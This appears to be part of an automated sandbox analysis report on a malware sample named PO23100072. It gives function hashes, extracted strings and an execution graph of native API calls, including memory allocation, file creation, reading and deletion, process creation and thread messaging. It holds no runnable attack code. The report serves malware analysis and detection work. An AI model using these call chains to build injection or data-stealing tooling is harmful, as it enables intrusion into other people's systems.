                                                                • Instruction ID: c56a07a522e8e8623b692b004a18d2d4df4dfdb996fda41b1463ec5fa351dc4b
                                                                • Opcode Fuzzy Hash: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                                • Instruction Fuzzy Hash: 6941F032600206ABDB21DE29CC41FA6F7B9FB99710F24061DFA56EB240DB20E942C7D1
                                                                Function 01852300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                • Opcode ID: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                                • Instruction ID: fce7c2ad759cbcab1371941371187a9fa2a4f8b2db4846993e0435e5ebae4259
                                                                • Opcode Fuzzy Hash: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                                • Instruction Fuzzy Hash: D8318772A00119DFDB60DE2DDC44BEEB7F9EB44710F440559ED49D3201EF309A488B60
                                                                Function 017E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction ID: c8b77c1f8d1381a3d17b5fb2968951b1e143b6e20e17d43ae3621f895eeb25da
                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction Fuzzy Hash: 9791A271E002169BEB28DF6DC889ABEFBE5FF4C320F54451AE955E72C4E73089818791
                                                                Function 017A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                • Opcode ID: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                                • Instruction ID: 7e5972e44cdd7518fcaa101ebe1deca91af4f53c9fa707221903119987c2c69d
                                                                • Opcode Fuzzy Hash: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                                • Instruction Fuzzy Hash: E6812D71D012699BDB76CF54CC49BEEB7B4AB48714F0041EAEA19B7280E7705E84CFA0
                                                                Function 0182CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0182CFBD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: CallFilterFunc@8
                                                                • String ID: @$@4Qw@4Qw
                                                                • API String ID: 4062629308-2383119779
                                                                • Opcode ID: f7365cf8e393549de62544ca6cdc6b3abbf59e6e5c413323020f5c336eeaf64b
                                                                • Instruction ID: 084a9f5174b8fc094d1b162a9402e10e031d6a62d059cca4c1b5fed9c858603a
                                                                • Opcode Fuzzy Hash: f7365cf8e393549de62544ca6cdc6b3abbf59e6e5c413323020f5c336eeaf64b
                                                                • Instruction Fuzzy Hash: E941B271900229DFCB229FA9C884AAEFBF8FF54740F14412AE915DB264D774DA41CB61

                                                                Execution Graph

                                                                Execution Coverage:2.6%
                                                                Dynamic/Decrypted Code Coverage:4.1%
                                                                Signature Coverage:2.2%
                                                                Total number of Nodes:464
                                                                Total number of Limit Nodes:75
                                                                execution_graph 99163 300b180 99165 300c7f1 99163->99165 99166 302b120 99163->99166 99169 3029210 99166->99169 99168 302b151 99168->99165 99170 30292a5 99169->99170 99172 302923b 99169->99172 99171 30292bb NtAllocateVirtualMemory 99170->99171 99171->99168 99172->99168 99173 301f500 99174 301f564 99173->99174 99202 3015f50 99174->99202 99176 301f69e 99177 301f697 99177->99176 99209 3016060 99177->99209 99179 301f843 99180 301f71a 99180->99179 99181 301f852 99180->99181 99213 301f2e0 99180->99213 99182 30290b0 NtClose 99181->99182 99184 301f85c 99182->99184 99185 301f756 99185->99181 99186 301f761 99185->99186 99222 302b290 99186->99222 99188 301f78a 99189 301f793 99188->99189 99190 301f7a9 99188->99190 99191 30290b0 NtClose 99189->99191 99225 301f1d0 CoInitialize 99190->99225 99193 301f79d 99191->99193 99194 301f7b7 99228 3028b50 99194->99228 99196 301f832 99232 30290b0 99196->99232 99198 301f83c 99235 302b1b0 99198->99235 99200 301f7d5 99200->99196 99201 3028b50 LdrInitializeThunk 99200->99201 99201->99200 99204 3015f83 99202->99204 99203 3015fa7 99203->99177 99204->99203 99238 3028bf0 99204->99238 99206 3015fca 99206->99203 99207 30290b0 NtClose 99206->99207 99208 301604a 99207->99208 99208->99177 99210 3016085 99209->99210 99243 3028a00 99210->99243 99214 301f2fc 99213->99214 99248 30141d0 99214->99248 99216 301f323 99216->99185 99217 301f31a 99217->99216 99218 30141d0 2 API calls 99217->99218 99219 301f3ee 99218->99219 99220 30141d0 2 API calls 99219->99220 99221 301f448 99219->99221 99220->99221 99221->99185 99256 30293d0 99222->99256 99224 302b2ab 99224->99188 99227 301f235 99225->99227 99226 301f2cb CoUninitialize 99226->99194 99227->99226 99229 3028b6a 99228->99229 99259 3772ba0 LdrInitializeThunk 99229->99259 99230 3028b9a 99230->99200 99233 30290cd 99232->99233 99234 30290de NtClose 99233->99234 99234->99198 99260 3029420 99235->99260 99237 302b1c9 99237->99179 99239 3028c0d 99238->99239 99242 3772ca0 LdrInitializeThunk 99239->99242 99240 3028c39 99240->99206 99242->99240 99244 3028a1a 99243->99244 99247 3772c60 LdrInitializeThunk 99244->99247 99245 30160f9 99245->99180 99247->99245 99250 30141f4 99248->99250 99249 30141fb 99249->99217 99250->99249 99252 301421a 99250->99252 99255 302c750 LdrLoadDll 99250->99255 99253 3014230 LdrLoadDll 99252->99253 99254 3014247 99252->99254 99253->99254 99254->99217 99255->99252 99257 30293ea 99256->99257 99258 30293fb RtlAllocateHeap 99257->99258 99258->99224 99259->99230 99261 302943d 99260->99261 99262 302944e RtlFreeHeap 99261->99262 99262->99237 99263 3016e00 99264 3016e1c 99263->99264 99265 3016e6f 99263->99265 99264->99265 99267 30290b0 NtClose 99264->99267 99266 3016fa7 99265->99266 99274 30161e0 NtClose LdrInitializeThunk LdrInitializeThunk 99265->99274 99268 3016e37 99267->99268 99273 30161e0 NtClose LdrInitializeThunk LdrInitializeThunk 99268->99273 99270 3016f81 99270->99266 99275 30163b0 NtClose LdrInitializeThunk LdrInitializeThunk 99270->99275 99273->99265 99274->99270 99275->99266 99276 301fe00 99277 301fe1d 99276->99277 99278 30141d0 2 API calls 99277->99278 99279 301fe3b 99278->99279 99285 3029000 99286 302907a 99285->99286 99288 302902e 99285->99288 99287 3029090 NtDeleteFile 99286->99287 99289 3021440 99290 302145c 99289->99290 99291 3021484 99290->99291 99292 3021498 99290->99292 99294 30290b0 NtClose 99291->99294 99293 30290b0 NtClose 99292->99293 99296 30214a1 99293->99296 99295 302148d 99294->99295 99299 302b2d0 RtlAllocateHeap 99296->99299 99298 30214ac 99299->99298 99301 30158c9 99302 3015852 99301->99302 99303 3015870 99302->99303 99307 3017dc0 99302->99307 99306 301589c 99303->99306 99311 3017d40 99303->99311 99308 3017dd3 99307->99308 99318 30285f0 99308->99318 99310 3017dfe 99310->99303 99312 3017d84 99311->99312 99317 3017da5 99312->99317 99324 30283c0 99312->99324 99314 3017d95 99315 3017db1 99314->99315 99316 30290b0 NtClose 99314->99316 99315->99303 99316->99317 99317->99303 99319 302866e 99318->99319 99320 302861b 99318->99320 99323 3772dd0 LdrInitializeThunk 99319->99323 99320->99310 99321 3028693 99321->99310 99323->99321 99325 3028440 99324->99325 99327 30283ee 99324->99327 99329 3774650 LdrInitializeThunk 99325->99329 99326 3028465 99326->99314 99327->99314 99329->99326 99330 3009b50 99332 3009da3 99330->99332 99333 3009f74 99332->99333 99334 302ae10 99332->99334 99335 302ae36 99334->99335 99340 3004120 99335->99340 99337 302ae42 99338 302ae7b 99337->99338 99343 3025330 99337->99343 99338->99333 99347 3012e80 99340->99347 99342 300412d 99342->99337 99344 3025392 99343->99344 99345 302539f 99344->99345 99365 3011630 99344->99365 99345->99338 99348 3012e9d 99347->99348 99350 3012eb6 99348->99350 99351 3029b30 99348->99351 99350->99342 99353 3029b4a 99351->99353 99352 3029b79 99352->99350 99353->99352 99358 30286f0 99353->99358 99356 302b1b0 RtlFreeHeap 99357 3029bf2 99356->99357 99357->99350 99359 302870d 99358->99359 99362 3772c0a 99359->99362 99360 3028739 99360->99356 99363 3772c1f LdrInitializeThunk 99362->99363 99364 3772c11 99362->99364 99363->99360 99364->99360 99366 301166b 99365->99366 99381 3017b50 99366->99381 99368 3011673 99369 302b290 RtlAllocateHeap 99368->99369 99379 3011956 99368->99379 99370 3011689 99369->99370 99371 302b290 RtlAllocateHeap 99370->99371 99372 301169a 99371->99372 99373 302b290 RtlAllocateHeap 99372->99373 99374 30116ab 99373->99374 99380 3011742 99374->99380 99396 30166b0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99374->99396 99376 30141d0 2 API calls 99377 3011902 99376->99377 99392 3027c70 99377->99392 99379->99345 99380->99376 99382 3017b7c 99381->99382 99397 3017a40 99382->99397 99385 3017ba9 99388 30290b0 NtClose 99385->99388 99389 3017bb4 99385->99389 99386 3017bc1 99387 3017bdd 99386->99387 99390 30290b0 NtClose 99386->99390 99387->99368 99388->99389 99389->99368 99391 3017bd3 99390->99391 99391->99368 99393 3027cd2 99392->99393 99395 3027cdf 99393->99395 99408 3011970 99393->99408 99395->99379 99396->99380 99398 3017a5a 99397->99398 99402 3017b36 99397->99402 99403 3028790 99398->99403 99401 30290b0 NtClose 99401->99402 99402->99385 99402->99386 99404 30287aa 99403->99404 99407 37735c0 LdrInitializeThunk 99404->99407 99405 3017b2a 99405->99401 99407->99405 99426 3017e20 99408->99426 99410 3011990 99411 3011ef3 99410->99411 99430 3020e10 99410->99430 99411->99395 99414 3011ba1 99438 302c4a0 99414->99438 99415 30119ee 99415->99411 99433 302c370 99415->99433 99417 3017dc0 LdrInitializeThunk 99420 3011c06 99417->99420 99418 30255a0 LdrInitializeThunk 99418->99420 99419 3011bb6 99419->99420 99444 3010480 99419->99444 99420->99411 99420->99417 99420->99418 99422 3010480 LdrInitializeThunk 99420->99422 99422->99420 99424 3011d60 99424->99420 99425 3017dc0 LdrInitializeThunk 99424->99425 99448 30255a0 99424->99448 99425->99424 99427 3017e2d 99426->99427 99428 3017e55 99427->99428 99429 3017e4e SetErrorMode 99427->99429 99428->99410 99429->99428 99431 302b120 NtAllocateVirtualMemory 99430->99431 99432 3020e31 99431->99432 99432->99415 99434 302c380 99433->99434 99435 302c386 99433->99435 99434->99414 99436 302b290 RtlAllocateHeap 99435->99436 99437 302c3ac 99436->99437 99437->99414 99439 302c410 99438->99439 99440 302c46d 99439->99440 99441 302b290 RtlAllocateHeap 99439->99441 99440->99419 99442 302c44a 99441->99442 99443 302b1b0 RtlFreeHeap 99442->99443 99443->99440 99445 301049a 99444->99445 99452 3029330 99445->99452 99449 3025602 99448->99449 99451 3025613 99449->99451 99457 3017570 99449->99457 99451->99424 99453 302934d 99452->99453 99456 3772c70 LdrInitializeThunk 99453->99456 99454 30104a2 99454->99424 99456->99454 99458 30175a5 99457->99458 99461 30174a0 99457->99461 99459 3010480 LdrInitializeThunk 99460 301755e 99459->99460 99460->99451 99461->99458 99461->99459 99462 3011f10 99463 3011f46 99462->99463 99464 30286f0 LdrInitializeThunk 99462->99464 99467 3029140 99463->99467 99464->99463 99466 3011f5b 99468 30291d2 99467->99468 99470 302916e 99467->99470 99472 3772e80 LdrInitializeThunk 99468->99472 99469 3029203 99469->99466 99470->99466 99472->99469 99473 301aa10 99478 301a720 99473->99478 99475 301aa1d 99492 301a3a0 99475->99492 99477 301aa33 99479 301a745 99478->99479 99503 3018030 99479->99503 99482 301a890 99482->99475 99484 301a8a7 99484->99475 99485 301a89e 99485->99484 99487 301a995 99485->99487 99522 3019df0 99485->99522 99489 301a9fa 99487->99489 99531 301a160 99487->99531 99490 302b1b0 RtlFreeHeap 99489->99490 99491 301aa01 99490->99491 99491->99475 99493 301a3b6 99492->99493 99500 301a3c1 99492->99500 99494 302b290 RtlAllocateHeap 99493->99494 99494->99500 99495 301a3e2 99495->99477 99496 3018030 GetFileAttributesW 99496->99500 99497 301a6f2 99498 301a70b 99497->99498 99499 302b1b0 RtlFreeHeap 99497->99499 99498->99477 99499->99498 99500->99495 99500->99496 99500->99497 99501 3019df0 RtlFreeHeap 99500->99501 99502 301a160 RtlFreeHeap 99500->99502 99501->99500 99502->99500 99504 3018051 99503->99504 99505 3018058 GetFileAttributesW 99504->99505 99506 3018063 99504->99506 99505->99506 99506->99482 99507 3023070 99506->99507 99508 302307e 99507->99508 99509 3023085 99507->99509 99508->99485 99510 30141d0 2 API calls 99509->99510 99511 30230ba 99510->99511 99512 30230c9 99511->99512 99535 3022b30 LdrLoadDll LdrLoadDll 99511->99535 99514 302b290 RtlAllocateHeap 99512->99514 99518 3023274 99512->99518 99515 30230e2 99514->99515 99516 302326a 99515->99516 99515->99518 99519 30230fe 99515->99519 99517 302b1b0 RtlFreeHeap 99516->99517 99516->99518 99517->99518 99518->99485 99519->99518 99520 302b1b0 RtlFreeHeap 99519->99520 99521 302325e 99520->99521 99521->99485 99523 3019e16 99522->99523 99536 301d810 99523->99536 99525 3019e88 99526 301a010 99525->99526 99528 3019ea6 99525->99528 99527 3019ff5 99526->99527 99529 3019cb0 RtlFreeHeap 99526->99529 99527->99485 99528->99527 99541 3019cb0 99528->99541 99529->99526 99532 301a186 99531->99532 99533 301d810 RtlFreeHeap 99532->99533 99534 301a20d 99533->99534 99534->99487 99535->99512 99537 301d834 99536->99537 99538 301d841 99537->99538 99539 302b1b0 RtlFreeHeap 99537->99539 99538->99525 99540 301d884 99539->99540 99540->99525 99542 3019ccd 99541->99542 99545 301d8a0 99542->99545 99544 3019dd3 99544->99528 99547 301d8c4 99545->99547 99546 301d96e 99546->99544 99547->99546 99548 302b1b0 RtlFreeHeap 99547->99548 99548->99546 99549 301c290 99551 301c2b9 99549->99551 99550 301c3bd 99551->99550 99552 301c363 FindFirstFileW 99551->99552 99552->99550 99555 301c37e 99552->99555 99553 301c3a4 FindNextFileW 99554 301c3b6 FindClose 99553->99554 99553->99555 99554->99550 99555->99553 99556 3028d90 99557 3028e47 99556->99557 99559 3028dbf 99556->99559 99558 3028e5d NtCreateFile 99557->99558 99560 302c3d0 99561 302b1b0 RtlFreeHeap 99560->99561 99562 302c3e5 99561->99562 99563 30217d0 99564 30217e9 99563->99564 99565 3021831 99564->99565 99568 3021874 99564->99568 99570 3021879 99564->99570 99566 302b1b0 RtlFreeHeap 99565->99566 99567 3021841 99566->99567 99569 302b1b0 RtlFreeHeap 99568->99569 99569->99570 99571 3020fd1 99583 3028f00 99571->99583 99573 3020ff2 99574 3021010 99573->99574 99575 3021025 99573->99575 99576 30290b0 NtClose 99574->99576 99577 30290b0 NtClose 99575->99577 99578 3021019 99576->99578 99580 302102e 99577->99580 99579 3021065 99580->99579 99581 302b1b0 RtlFreeHeap 99580->99581 99582 3021059 99581->99582 99584 3028faa 99583->99584 99586 3028f2e 99583->99586 99585 3028fc0 NtReadFile 99584->99585 99585->99573 99586->99573 99589 3021759 99590 302175f 99589->99590 99591 30290b0 NtClose 99590->99591 99592 3021764 99590->99592 99593 3021789 99591->99593 99594 30198df 99595 30198ef 99594->99595 99596 30198f6 99595->99596 99597 302b1b0 RtlFreeHeap 99595->99597 99597->99596 99598 30184e1 99600 30184f1 99598->99600 99599 30184a1 99600->99599 99602 3016c40 LdrInitializeThunk LdrInitializeThunk 99600->99602 99602->99599 99603 3016fe0 99604 3017052 99603->99604 99605 3016ff8 99603->99605 99605->99604 99607 301af30 99605->99607 99608 301af56 99607->99608 99609 301b17d 99608->99609 99634 30294b0 99608->99634 99609->99604 99611 301afcc 99611->99609 99612 302c4a0 2 API calls 99611->99612 99613 301afeb 99612->99613 99613->99609 99614 301b0bc 99613->99614 99616 30286f0 LdrInitializeThunk 99613->99616 99615 301b0d8 99614->99615 99617 30157c0 LdrInitializeThunk 99614->99617 99623 301b165 99615->99623 99640 3028260 99615->99640 99618 301b04d 99616->99618 99617->99615 99618->99614 99620 301b056 99618->99620 99619 301b0a4 99622 3017dc0 LdrInitializeThunk 99619->99622 99620->99609 99620->99619 99621 301b085 99620->99621 99637 30157c0 99620->99637 99655 30244b0 LdrInitializeThunk 99621->99655 99627 301b0b2 99622->99627 99626 3017dc0 LdrInitializeThunk 99623->99626 99630 301b173 99626->99630 99627->99604 99629 301b13c 99645 3028310 99629->99645 99630->99604 99632 301b156 99650 3028470 99632->99650 99635 30294cd 99634->99635 99636 30294de CreateProcessInternalW 99635->99636 99636->99611 99639 30157fe 99637->99639 99656 30288c0 99637->99656 99639->99621 99641 30282dd 99640->99641 99642 302828b 99640->99642 99662 37739b0 LdrInitializeThunk 99641->99662 99642->99629 99643 3028302 99643->99629 99646 3028390 99645->99646 99647 302833e 99645->99647 99663 3774340 LdrInitializeThunk 99646->99663 99647->99632 99648 30283b5 99648->99632 99651 30284f0 99650->99651 99652 302849e 99650->99652 99664 3772fb0 LdrInitializeThunk 99651->99664 99652->99623 99653 3028515 99653->99623 99655->99619 99657 3028971 99656->99657 99658 30288ef 99656->99658 99661 3772d10 LdrInitializeThunk 99657->99661 99658->99639 99659 30289b6 99659->99639 99661->99659 99662->99643 99663->99648 99664->99653 99665 3016a20 99666 3016a4a 99665->99666 99669 3017bf0 99666->99669 99668 3016a74 99670 3017c0d 99669->99670 99676 30287e0 99670->99676 99672 3017c5d 99673 3017c64 99672->99673 99674 30288c0 LdrInitializeThunk 99672->99674 99673->99668 99675 3017c8d 99674->99675 99675->99668 99677 302887b 99676->99677 99679 302880b 99676->99679 99681 3772f30 LdrInitializeThunk 99677->99681 99678 30288b4 99678->99672 99679->99672 99681->99678 99682 3028520 99683 302854b 99682->99683 99684 30285af 99682->99684 99687 3772ee0 LdrInitializeThunk 99684->99687 99685 30285e0 99687->99685 99688 3025da0 99689 3025dfa 99688->99689 99691 3025e07 99689->99691 99692 3023790 99689->99692 99693 302b120 NtAllocateVirtualMemory 99692->99693 99694 30237d1 99693->99694 99695 30141d0 2 API calls 99694->99695 99697 30238de 99694->99697 99698 3023817 99695->99698 99696 3023860 Sleep 99696->99698 99697->99691 99698->99696 99698->99697 99699 30286a0 99700 30286ba 99699->99700 99703 3772df0 LdrInitializeThunk 99700->99703 99701 30286e2 99703->99701 99709 3772ad0 LdrInitializeThunk 99710 30123e8 99711 3015f50 2 API calls 99710->99711 99712 3012413 99711->99712 99713 3009af0 99714 3009aff 99713->99714 99715 3009b40 99714->99715 99716 3009b2d CreateThread 99714->99716 99717 30109f0 99718 3010a0a 99717->99718 99719 30141d0 2 API calls 99718->99719 99720 3010a28 99719->99720 99721 3010a5c PostThreadMessageW 99720->99721 99722 3010a6d 99720->99722 99721->99722 99723 3027ff0 99724 302800a 99723->99724 99725 302801b RtlDosPathNameToNtPathName_U 99724->99725 99731 3012d7c 99732 3017a40 2 API calls 99731->99732 99733 3012d8c 99732->99733 99734 3012da8 99733->99734 99735 30290b0 NtClose 99733->99735 99735->99734

                                                                Executed Functions

                                                                Function 03009B50 Relevance: 22.8, Strings: 18, Instructions: 276COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 166 3009b50-3009da1 167 3009db2-3009dbe 166->167 168 3009da3-3009dac 166->168 169 3009dc0-3009dd3 167->169 170 3009dd5 167->170 168->167 169->168 171 3009ddc-3009de3 170->171 172 3009de5-3009e08 171->172 173 3009e0a-3009e11 171->173 172->171 174 3009e18-3009e31 173->174 174->174 175 3009e33-3009e3c 174->175 176 3009e42-3009e4c 175->176 177 3009f14-3009f1b 175->177 180 3009e5d-3009e66 176->180 178 3009f21-3009f2b 177->178 179 300a04f-300a059 177->179 181 3009f3c-3009f48 178->181 184 300a06a-300a076 179->184 182 3009e76-3009e79 180->182 183 3009e68-3009e74 180->183 185 3009f4a-3009f53 181->185 186 3009f6f call 302ae10 181->186 187 3009e7f-3009e86 182->187 183->180 189 300a078-300a081 184->189 190 300a08e-300a095 184->190 191 3009f55-3009f59 185->191 192 3009f5a-3009f5c 185->192 202 3009f74-3009f7e 186->202 193 3009eb8-3009ec2 187->193 194 3009e88-3009eb6 187->194 195 300a083-300a086 189->195 196 300a08c 189->196 198 300a0c7-300a0d0 190->198 199 300a097-300a0c5 190->199 191->192 200 3009f6d 192->200 201 3009f5e-3009f67 192->201 203 3009ed3-3009edf 193->203 194->187 195->196 196->184 199->190 205 3009f2d-3009f36 200->205 201->200 206 3009f8f-3009f9b 202->206 207 3009ee1-3009ef0 203->207 208 3009ef2-3009f01 203->208 205->181 210 3009fa8-3009fac 206->210 211 3009f9d-3009fa6 206->211 207->203 212 3009f03 208->212 213 3009f05-3009f0f 208->213 214 3009fd5-3009fde 210->214 215 3009fae-3009fd3 210->215 211->206 212->177 213->175 217 3009fe0-3009ff2 214->217 218 3009ff4-3009ffb 214->218 215->210 217->214 219 300a022-300a026 218->219 220 3009ffd-300a020 218->220 219->179 221 300a028-300a04d 219->221 220->218 221->219
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #o$,$,!$.$.DXd$0$1|$61$6T$@8$D4$E$J$T$Xd$ZW$b$f
                                                                • API String ID: 0-2960789933
                                                                • Opcode ID: 35590c8b130e87213382511bdfffc95edf34350a7e3aa2f829abf5579503ecfc
                                                                • Instruction ID: b5e2eb09179083082fa58fc58c209d0d85d0f22e6f74053448fe16168cda3646
                                                                • Opcode Fuzzy Hash: 35590c8b130e87213382511bdfffc95edf34350a7e3aa2f829abf5579503ecfc
                                                                • Instruction Fuzzy Hash: 79E1D0B0E0626DCFEB24CF44C994BEDBBB2BB45308F1085D9D1596B291C7B91A88CF51
                                                                Function 0301C290 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0301C374
                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0301C3AF
                                                                • FindClose.KERNELBASE(?), ref: 0301C3BA
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 3541575487-0
                                                                • Opcode ID: 66c96e6f90ef2f9e47d2401661692ba17a794f59cb98951b2a74a0c6821fe9ec
                                                                • Instruction ID: 484a4d4c67108a5d8b791250b432f446d66e7d2bbdf062526fbe73b0dc46edaf
                                                                • Opcode Fuzzy Hash: 66c96e6f90ef2f9e47d2401661692ba17a794f59cb98951b2a74a0c6821fe9ec
                                                                • Instruction Fuzzy Hash: E231A675941308BBEB64EF60CC85FFF77BC9F84704F144559B908AB180DB70AA948BA1
                                                                Function 03028D90 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtCreateFile.NTDLL(2888A750,?,?,?,?,?,?,?,?,?,?), ref: 03028E8E
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 8263e9b9b3655f0d7f7f85571750a182001a6f476e1524a903f998bad7412ed5
                                                                • Instruction ID: ca130d6d42a301374862dd07c8931b6a4b6043451a95a3252b06860805374a40
                                                                • Opcode Fuzzy Hash: 8263e9b9b3655f0d7f7f85571750a182001a6f476e1524a903f998bad7412ed5
                                                                • Instruction Fuzzy Hash: 0931A3B5A01208AFDB14DF98D880EDEBBB9AF8C314F508109F919A7340D730A951CBA5
                                                                Function 03028F00 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtReadFile.NTDLL(2888A750,?,?,?,?,?,?,?,?), ref: 03028FE9
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: f9e2abaf3592445059f4fccfabe1212306f5964c21800777085ab5dbbfcdb515
                                                                • Instruction ID: 747cfbdc482e32cfa59ee68924261365c4e599ecea6694cd580d209c09d0369d
                                                                • Opcode Fuzzy Hash: f9e2abaf3592445059f4fccfabe1212306f5964c21800777085ab5dbbfcdb515
                                                                • Instruction Fuzzy Hash: 9A31C7B5A01608AFDB14DF98D881EEFBBB9EF8C310F108119FD18A7340D670A9558FA5
                                                                Function 03029210 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(2888A750,?,03027CDF,00000000,00000004,00003000,?,?,?,?,?,03027CDF,030119EE,030119EE,00000000,?), ref: 030292D8
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: 9748e708b96aa18100ac35f0450ba1d82ff0ea418837c52caf31f50557a53c81
                                                                • Instruction ID: 0747bb72f30b3c77bfc4bbcad18ae4a0d55a2d7d49b2ecf48646f157ea973a3d
                                                                • Opcode Fuzzy Hash: 9748e708b96aa18100ac35f0450ba1d82ff0ea418837c52caf31f50557a53c81
                                                                • Instruction Fuzzy Hash: 0221E6B5A01209AFDB14DF98DC81FEFBBB9EF88710F108109FD18A7240D774A9158BA5
                                                                Function 03029000 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtDeleteFile.NTDLL(2888A750), ref: 03029099
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteFile
                                                                • String ID:
                                                                • API String ID: 4033686569-0
                                                                • Opcode ID: 32f47c7f7706f169638fbfc647d15ffa62a41e2f99afdc25711ee14c5b4c1205
                                                                • Instruction ID: 64050d2a9664920882b5ae8f25b08722f3b836669d878f73d0e03c21d7884d30
                                                                • Opcode Fuzzy Hash: 32f47c7f7706f169638fbfc647d15ffa62a41e2f99afdc25711ee14c5b4c1205
                                                                • Instruction Fuzzy Hash: DE119E75641708BED624EB64CC41FEF7BACDFC5314F408109FA08AB280D6717A158BA5
                                                                Function 030290B0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 030290E7
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3000000_userinit.jbxd
